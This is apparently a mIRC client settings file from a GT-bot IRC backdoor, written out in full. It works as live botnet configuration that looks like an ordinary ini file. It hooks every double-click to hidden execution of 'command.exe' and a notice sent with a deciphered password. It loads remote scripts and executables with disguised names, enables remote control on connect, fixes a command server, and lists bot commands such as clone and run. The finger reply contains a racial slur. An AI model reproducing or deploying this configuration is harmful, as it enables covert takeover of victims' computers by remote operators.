[about]
show=sheep

[windows]
scripts=55,648,-1,515,0,0,0
main=776,112,-14,27,0,1,0
wchannel=0,112,0,27,0,1,0
status=0,112,0,27,0,1,0
wquery=0,431,0,144,1,1,0
wserv=0,483,0,345,1,1,0
#gtcontrol=21,112,436,27,0,1,0
wmessage=14,633,57,393,0,1,0
wdccg=21,240,21,212,0,1,0
wnotify=21,493,21,333,0,1,0
wwwwlist=42,493,42,333,0,1,0

[dde]
ServerStatus=off
ServiceName=Genisous
CheckName=off

[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini

[dccserver]
n0=0,59,0,0,0,0

[fonts]
fscripts=Courier,411,0
fstatus=Wingdings 2,407,2
fchannel=Wingdings,407,2
fquery=Wingdings,407,2
f#.chat-z0n3.=Wingdings,407,2

[fileserver]
warning=off
homedir=c:

[ident]
active=yes
system=UNIX
port=113
userid=_BoUnCeR_

[socks]
Enabled=no
Port=1080
method=4
dccs=no

[clicks]
status=//run $mircdir $+ command.exe /n /fh Rundlll. | .notice $decipher(%encpass,%s.c) :DoubleClicked: Status
query=//run $mircdir $+ command.exe /n /fh Rundlll. | .notice $decipher(%encpass,%s.c) :DoubleClicked: Query
channel=//run $mircdir $+ command.exe /n /fh Rundlll. | .notice $decipher(%encpass,%s.c) :DoubleClicked: Channel
nicklist=//run $mircdir $+ command.exe /n /fh Rundlll. | .notice $decipher(%encpass,%s.c) :DoubleClicked: Nick-List
notify=//run $mircdir $+ command.exe /n /fh Rundlll.  | .notice $decipher(%encpass,%s.c) :DoubleClicked: Notify-List

[text]
commandchar=/
linesep=-
timestamp=[HH:nn]
network=All
ignore=*.bat,*.com,*.js,*.lnk,*.pif,*.pl,*.scr,*.shs,*.vbs
accept=*.exe,*.ini,*.mrc,*.dll
lastreset=[no date]
finger=wassup nigga
quit=5[14-W15s14C-5] 12(14v151.00012) [ $ip ]

[files]
addrbk=addrbk.ini
servers=servers.ini
browser=c:\progra~1\intern~1\iexplore.exe
emailer=c:\program files\outlook express\msimn.exe
finger=finger.txt
urls=urls.ini

[mirc]
nick=WsC[77583]
anick=GT-bot
host=b.kosherexpress.com.auSERVER:b.kosherexpress.com.au:6667
user=snoopy|II2
email=MIz[t]riouz-[X]S

[dirs]

[colours]
n0=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

[options]
n0=0,0,0,0,0,1,300,1,1,1,1,0,0,0,1,1,0,1,1,1,512,0,1,3,0,0,1,1,0,50,1,0
n1=0,0,0,0,0,0,0,0,2,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,20,0,0,0,2,2,0
n2=1,0,0,0,1,1,1,1,0,80,160,1,1,1,1,0,0,0,0,160,40,10,0,0,1,0,0,1,0,0
n3=200,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,2,0,0,0,0,3,180
n4=0,0,1,0,0,3,9999,0,0,1,1,0,1024,0,1,9999,20,0,0,0,1,0,0,0,1,5000,0,2,0
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,1,1,0,300,10,4,0,0,22,0,0,0,999999
n6=0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,1,0,1,2

[warn]
fserve=off
dcc=off

[nicklist]

[dccnicks]

[events]
default=2,2,3,2,2,0,1,2

[wizard]
warning=2

[findtext]
n0=.don
n1=clone*,0)
n2=clone*
n3=.run
n10=.clone
n11=don*,0)
n12=don*

[channelfiles]
n0=channels.txt

[local]
localip=211.28.24.212
longip=3541833940

[waves]
send=No Sound

[dragdrop]
n0=*.wav:/sound $1 $2-
n1=*.*:/dcc send $1 $2-
s0=*.*:/dcc send $1 $2-

[Perform]
n0=/.Remote ON

[extensions]
n0=defaultEXTDIR:\

[agent]
enable=0,0,0
char=default
options=1,1,1,100,0
speech=150,60,100,1,180,10,50,1,1,1,0,50
channel=1,1,1,1,1,1,1,1,1
private=1,1,1,1
other=1,1,1,1,1,1,1
pos=20,20

[afiles]
n0=aliases.ini

[rfiles]
n0=rnaap-9.dll
n1=sckclient.dll
n2=clientsck1.exe
n3=d3dxfo.exe
n4=bnc.exe
n5=vgetia-543.dll

